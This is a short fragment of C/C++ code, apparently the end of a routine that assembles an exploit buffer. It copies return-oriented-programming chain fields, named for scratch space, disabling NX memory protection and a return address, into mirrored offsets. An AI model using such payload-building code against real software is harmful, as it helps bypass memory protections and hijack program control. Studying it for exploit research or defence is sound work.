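				const int mirrored = kFieldSize - 1 - i;
				buffer[kScratchAt + mirrored] = rop.scratch[i];
				buffer[kDisableNxAt + mirrored] = rop.disablenx[i];
				buffer[kRetAt + mirrored] = rop.ret[i];
			}

			return buffer;
		}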